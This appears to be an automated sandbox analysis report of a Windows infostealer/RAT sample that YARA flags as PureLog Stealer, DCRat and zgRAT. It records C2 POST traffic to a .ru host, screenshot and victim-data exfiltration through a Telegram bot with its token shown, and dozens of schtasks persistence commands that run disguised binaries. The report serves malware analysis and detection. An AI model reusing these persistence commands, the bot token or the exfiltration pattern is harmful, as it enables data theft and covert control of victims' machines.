                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8109&min_rtt=1813&rtt_var=13273&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=27977&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
149 | 192.168.2.6 | 62789 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:04:00.535706997 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
Jan 1, 2025 16:04:00.892158031 CET | 1124 | OUT | Data Raw: 56 52 5a 50 51 5a 51 56 58 56 52 59 56 5f 59 53 5b 52 54 5c 55 54 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VRZPQZQVXVRYV_YS[RT\UTPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$" -]'.$8U78X*);R><#4+A1,<,*&Y.,Y-9
Jan 1, 2025 16:04:00.985563993 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:04:01.164676905 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:04:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EiJmszx2bJ2oH14GHDRgTLGU5h3RAWymH1cbm5LZMoaOxfXs%2FR6pDaublGWDRSNNEtZzHgCbWbBT68IByNYvcEB7JBOmfIgLmy%2F4nON0vaezm8gMp%2BkQVgsF56h478SfDn3YcnwW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3663ddc9e42fe-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3701&min_rtt=2493&rtt_var=3351&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=120075&cwnd=68&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 34.117.59.81 | 443 | 3084 | C:\Drivers\fontdrvhost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 15:02:08 UTC | 61 | OUT | GET /ip HTTP/1.1
                                                                                                                  Host: ipinfo.io
                                                                                                                  Connection: Keep-Alive
2025-01-01 15:02:09 UTC | 305 | IN | HTTP/1.1 200 OK
                                                                                                                  date: Wed, 01 Jan 2025 15:02:08 GMT
                                                                                                                  content-type: text/plain; charset=utf-8
                                                                                                                  Content-Length: 12
                                                                                                                  access-control-allow-origin: *
                                                                                                                  via: 1.1 google
                                                                                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
2025-01-01 15:02:09 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                  Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49711 | 34.117.59.81 | 443 | 3084 | C:\Drivers\fontdrvhost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 15:02:09 UTC | 42 | OUT | GET /country HTTP/1.1
                                                                                                                  Host: ipinfo.io
2025-01-01 15:02:09 UTC | 448 | IN | HTTP/1.1 200 OK
                                                                                                                  access-control-allow-origin: *
                                                                                                                  Content-Length: 3
                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                  date: Wed, 01 Jan 2025 15:02:09 GMT
                                                                                                                  referrer-policy: strict-origin-when-cross-origin
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                  via: 1.1 google
                                                                                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
2025-01-01 15:02:09 UTC | 3 | IN | Data Raw: 55 53 0a
                                                                                                                  Data Ascii: US


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49712 | 149.154.167.220 | 443 | 3084 | C:\Drivers\fontdrvhost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 15:02:10 UTC | 255 | OUT | POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary="41e39329-f7ed-4a24-a87a-8d5d41ec4466"
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 86650
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
2025-01-01 15:02:10 UTC | 25 | IN | HTTP/1.1 100 Continue
2025-01-01 15:02:10 UTC | 40 | OUT | Data Raw: 2d 2d 34 31 65 33 39 33 32 39 2d 66 37 65 64 2d 34 61 32 34 2d 61 38 37 61 2d 38 64 35 64 34 31 65 63 34 34 36 36 0d 0a
                                                                                                                  Data Ascii: --41e39329-f7ed-4a24-a87a-8d5d41ec4466
2025-01-01 15:02:10 UTC | 89 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                  Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2025-01-01 15:02:10 UTC | 10 | OUT | Data Raw: 36 32 38 33 33 37 33 34 34 32
                                                                                                                  Data Ascii: 6283373442
2025-01-01 15:02:10 UTC | 131 | OUT | Data Raw: 0d 0a 2d 2d 34 31 65 33 39 33 32 39 2d 66 37 65 64 2d 34 61 32 34 2d 61 38 37 61 2d 38 64 35 64 34 31 65 63 34 34 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                  Data Ascii: --41e39329-f7ed-4a24-a87a-8d5d41ec4466Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
2025-01-01 15:02:10 UTC | 143 | OUT | Data Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 61 33 31 35 30 33 31 34 33 31 31 61 38 34 39 36 62 32 35 65 37 30 34 30 35 63 36 35 36 66 61 32 33 36 32 33 65 34 65 35 0a 43 6f 6d 6d 65 6e 74 3a 20 4e 45 57 4f 52 4b 20 50 43 0a 55 73 65 72 6e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 0a 50 43 20 4e 61 6d 65 3a 20 31 33 38 37 32 37 0a 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a 47 45 4f 3a 20 55 53 0a
                                                                                                                  Data Ascii: new user connect !ID: a3150314311a8496b25e70405c656fa23623e4e5Comment: NEWORK PCUsername: userPC Name: 138727IP: 8.46.123.189GEO: US
2025-01-01 15:02:10 UTC | 146 | OUT | Data Raw: 0d 0a 2d 2d 34 31 65 33 39 33 32 39 2d 66 37 65 64 2d 34 61 32 34 2d 61 38 37 61 2d 38 64 35 64 34 31 65 63 34 34 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                  Data Ascii: --41e39329-f7ed-4a24-a87a-8d5d41ec4466Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                  2025-01-01 15:02:11 UTC1587INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:11 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 1198
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  {"ok":true,"result":{"message_id":821,"from":{"id":8143016568,"is_bot":true,"first_name":"\u0411\u041e\u0422\u0418\u041a","username":"Heusjsjs628_bot"},"chat":{"id":6283373442,"first_name":"Loftan","username":"Lofty_Code","type":"private"},"date":1735743731,"photo":[{"file_id":"AgACAgEAAxkDAAIDNWd1WPPWdzWV5GeFxqTwPqrGfk1tAAKLrDEbCc2pR-wBoY2EERWNAQADAgADcwADNgQ","file_unique_id":"AQADi6wxGwnNqUd4","file_size":1096,"width":90,"height":72},{"file_id":"AgACAgEAAxkDAAIDNWd1WPPWdzWV5GeFxqTwPqrGfk1tAAKLrDEbCc2pR-wBoY2EERWNAQADAgADbQADNgQ","file_unique_id":"AQADi6wxGwnNqUdy","file_size":13991,"width":320,"height":256},{"file_id":"AgACAgEAAxkDAAIDNWd1WPPWdzWV5GeFxqTwPqrGfk1tAAKLrDEbCc2pR-wBoY2EERWNAQADAgADeAADNgQ","file_unique_id":"AQADi6wxGwnNqUd9","file_size":58384,"width":800,"height":640},{"file_id":"AgACAgEAAxkDAAIDNWd1WPPWdzWV5GeFxqTwPqrGfk1tAAKLrDEbCc2pR-wBoY2EERWNAQADAgADeQADNgQ","file_unique_id":"AQADi6wxGwnNqUd-","file_size":86047,"width":1280,"height":1024}],"caption":"new user connect !\nID: a3150314311a84 [TRUNCATED]



                                                                                                                  Target ID:0
                                                                                                                  Start time:10:02:00
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\eP6sjvTqJa.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\eP6sjvTqJa.exe"
                                                                                                                  Imagebase:0xb80000
                                                                                                                  File size:2'317'084 bytes
                                                                                                                  MD5 hash:F0944C44A97161524CE95C9F8A2629F9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2112514278.000000000556C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2110949935.0000000006C2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:10:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe"
                                                                                                                  Imagebase:0x3d0000
                                                                                                                  File size:147'456 bytes
                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:10:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" "
                                                                                                                  Imagebase:0x1c0000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:10:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:10:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Drivers\fontdrvhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\/Drivers/fontdrvhost.exe"
                                                                                                                  Imagebase:0x150000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2139475451.0000000000152000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2222372567.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 76%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:10:02:06
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 5 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:7
                                                                                                                  Start time:10:02:06
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:8
                                                                                                                  Start time:10:02:06
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 11 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:9
                                                                                                                  Start time:10:02:06
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:10
                                                                                                                  Start time:10:02:06
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:11
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:12
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:13
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:14
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:15
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\user\backgroundTaskHost.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:16
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:17
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:18
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:19
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:20
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:21
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:22
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:23
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
